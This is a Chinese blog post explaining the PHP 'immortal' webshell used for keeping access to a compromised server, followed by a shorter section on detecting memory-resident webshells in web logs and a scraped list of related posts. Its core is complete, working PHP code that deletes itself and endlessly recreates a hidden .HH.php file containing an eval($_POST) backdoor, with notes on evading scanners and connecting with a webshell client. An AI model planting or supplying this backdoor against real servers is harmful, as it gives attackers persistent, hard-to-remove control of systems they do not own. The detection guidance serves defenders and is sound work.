PHP不死马是我们达到权限维持的目的。

不死马的原理:

由客户端发起的Web请求后,中间件的各个独立的组件如ListenerFilterServlet等组件会在请求过程中做监听、判断、过滤等操作,内存马就是利用请求过程在内存中修改已有的组件或动态注册一个新的组件,插入恶意的shellcode,达到持久化控制服务器的目的

PHP不死马:

<?php
ignore_user_abort(true);
set_time_limit(0);
@unlink(__FILE__);
$file = '.HH.php';
$code = '<?php @eval($_POST[\'c\']); ?>';
while (1){
    file_put_contents($file,$code);
    usleep(5000);
}
?>

set_time_limit()函数:设置允许脚本运行的时间,单位为秒(如果设置该运行时间,sleep()函数在执行程序时的持续时间将会被忽略掉)

ignore_user_abort()函数:函数设置与客户机断开是否会终止脚本的执行(如果设置为True,则忽略与用户的断开)

unlink(FILE)函数:删除文件(防止文件落地被检测工具查杀)

file_put_contents函数:将一个字符串写入该文件中

usleep函数:延迟执行当前脚本数微秒,即条件竞争

在访问PHP文件的话 会生成一个.HH.php文件,然后会把自身文件删除,然后就可以用菜刀连接.HH.php:

删除.HH.php文件的话他会不断生成 .HH.php

内存马的检测

内存马排查思路: 先判断是通过什么方法注入的内存马,可以先查看web日志是否有可疑的web访问日志,如果是filter或者listener类型就会有大量url请求路径相同参数不同的,或者页面不存在但是返回200的,查看是否有类似哥斯拉、冰蝎相同的url请求,哥斯拉和冰蝎的内存马注入流量特征与普通webshell的流量特征基本吻合。通过查找返回200的url路径对比web目录下是否真实存在文件,如不存在大概率为内存马。

如在web日志中并未发现异常,可以排查是否为中间件漏洞导致代码执行注入内存马,排查中间件的error.log日志查看是否有可疑的报错,根据注入时间和方法根据业务使用的组件排查是否可能存在java代码执行漏洞以及是否存在过webshell,排查框架漏洞,反序列化漏洞

关于PHP不死马的分析和总结相关推荐

  1. AWD-----监控不死马垃圾包资源库

    1.知识: AWD规则: 2.防守-----流量监控-----实时获取访问数据包流量 利用 WEB 访问监控配合文件监控能实现 WEB 攻击分析及后门清除操作,确保写入后门操作失效,也能确保分析到无后 ...

  2. 专访死马:为什么说Egg.js是企业级Node框架

    在 7 月 6 日的 ArchSummit 架构师峰会深圳站上,Egg.js 的主要开发者不四(网名死马)将给参会者带来<企业级 Node.js Web 框架研发与落地>的分享,借此机会, ...

  3. 7.awd不死马权限维持及变种

    不死马又叫内存马,就是运行一段永远不退出的程序常驻在PHP进程里,无限执行. 不死马.php->上传到server->server执行文件->server本地无限循环生成 (一句话. ...

  4. 渗透测试-不死马的创建和查杀

    不死马的创建和查杀 文章目录 不死马的创建和查杀 0x00 创建 0x01 查看 0x02 查杀 root用户角度的查杀: 重启web服务. 其他用户的查杀: 0x00 创建 md5加密密码: 代码: ...

  5. 笔记本电脑计算机出现问题怎么办,笔记本电脑经常死机怎么办 笔记本电脑死机原因分析...

    笔记本电脑经常死机 笔记本电脑死机原因分析: 笔记本电脑重启和死机故障现象是电脑维修过程中的经常出现问题,涉及的原因也是多方面的.经验告诉我笔记本电脑的重启.死机故障现象和机型牌子有一定的关系,一般要 ...

  6. 由Debuggerd导致的Android系统死机问题分析

    1. 问题现象 问题发生的Android系统版本是7.0(Nougat): 屏幕没有任何刷新,输入事件无任何响应,即我们平时说的死机(冻屏): watchdog没有重启system_server: 问 ...

  7. Android死机问题分析

    1. 死机/phong hang 定义 当手机长时间无法再被用户控制操作时,我们称为死机或者hang 机. 在这里我们强调长时间,如果是短时间,我们归结为Perfomance 问题,即性能问题. 2. ...

  8. 不死马php如何取证_AWD不死马与克制方法

    一个简单的不死马如: ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.3.php'; $code = ' ...

  9. Windows权限维持之php不死马、映像劫持、策略组脚本

    文中主要讲解Windows权限维持中的小技巧,通过了解掌握php不死马.映像劫持.策略组脚本等方式,更快知晓权限维持作用.本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若 ...

最新文章

  1. Spring Boot + Mybatis + Shiro 后台权限管理系统
  2. powershell获取linux文件,powershell如何读取文件名并赋值到变量?
  3. 两年实现Nature和Science双发,这位电子科大博士火了
  4. 设计模式-由浅到深的单例模式
  5. 15.10.4 捕获异常
  6. html 手机a标签点不动,htmlunit单击javascript a标签不起作用
  7. C# 9.0 新特性之 Lambda 弃元参数
  8. 自定义ViewGroup (3) 与子View之间 Touch Event的拦截与处理
  9. SQL Server创建数据库
  10. xxnet 360浏览器设置
  11. ElmentUI数据表格 序号
  12. 最简单AS5048a模块鉴别和读取数据
  13. postfix 测试邮件服务器,搭建Postfix邮件服务器
  14. aligned_allocator
  15. oracle 的keep用法及partition
  16. 第一章 前端开发——HTML5/CSS3
  17. 2021年中国旅游人次、箱包销售收入及利润总额分析[图]
  18. 2021-01-20
  19. SpringMVC —— @ResponseBody原理
  20. 分析晶体三极管频率特性的等效模型

热门文章

  1. 基于JAVA智能化车辆管理综合信息平台计算机毕业设计源码+系统+数据库+lw文档+部署
  2. 理解SQL语句中 Exists()
  3. Python 2.7.15 初学者模拟双扣扑双扣升级随机发牌
  4. 技嘉主板控制机箱风扇_在机箱外为主板加电是否安全?
  5. 报关单货物重量填写错误-跨境知道
  6. 【转贴】游戏引擎大全
  7. 开发和常用工具推荐清单 转载
  8. php 中js跳转页面跳转页面,js跳转代码_PHP页面跳转 Js页面跳转代码
  9. modbus tcp 协议
  10. Flutter开发实战 高仿微信(二)发现页